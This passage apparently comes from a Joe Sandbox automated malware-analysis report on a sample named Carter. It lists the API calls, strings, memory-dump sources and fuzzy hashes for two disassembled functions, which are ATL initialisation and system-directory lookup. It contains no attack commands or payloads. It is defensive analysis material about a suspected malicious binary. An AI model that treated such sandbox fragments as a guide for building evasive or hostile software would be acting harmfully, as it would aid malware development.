                                                                        • Instruction ID: 3d19277520df55fe095f82bb6f3b6000f20665cd041eedc7e049837882aecd5a
                                                                        • Opcode Fuzzy Hash: 8b3125156cf69e325139da72f5ae0f0a373b891da01559c14f18e0e1ec263ca8
                                                                        • Instruction Fuzzy Hash: 28D02B3138031C32E32132E96C1AFDB7A4C8F15B51F10402EFBC8B90C28DD6948042E4
                                                                        Function 0101B4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0101B544: _memset.LIBCMT ref: 0101B551
                                                                          • Part of subcall function 01000B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0101B520,?,?,?,00FE100A), ref: 01000B79
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00FE100A), ref: 0101B524
                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FE100A), ref: 0101B533
                                                                        Strings
                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0101B52E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                        • API String ID: 3158253471-631824599
                                                                        • Opcode ID: 4a7aec46e3c8b731f8208676235522ba4ba088d1fba23906c1cc731b1cdcdf65
                                                                        • Instruction ID: 6e3dd54a3b6665e73714f140706db80765817b425a8bdf55efabcc77cb7cf9b2
                                                                        • Opcode Fuzzy Hash: 4a7aec46e3c8b731f8208676235522ba4ba088d1fba23906c1cc731b1cdcdf65
                                                                        • Instruction Fuzzy Hash: 97E06D702047418BD330AF29E004B427AF4BF04744F008A5DE4C6CA349EBBAD444CB91
                                                                        Function 01020251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 01020091
                                                                          • Part of subcall function 0105C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0102027A,?), ref: 0105C6E7
                                                                          • Part of subcall function 0105C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0105C6F9
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 01020289
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                        • String ID: WIN_XPe
                                                                        • API String ID: 582185067-3257408948
                                                                        • Opcode ID: 09aa78a63e8b2b19d358c2b759e231df3f768c284d04823f17b4640dc455a543
                                                                        • Instruction ID: b0a2222386433ed6408dbd9e9111ab1a2bf9711e010ad542c3840d0ae57d0cba
                                                                        • Opcode Fuzzy Hash: 09aa78a63e8b2b19d358c2b759e231df3f768c284d04823f17b4640dc455a543
                                                                        • Instruction Fuzzy Hash: ADF06D7190421ADFEB65DBA4C594BECBBF8AB08300F140485F286B2098CB796F80CF21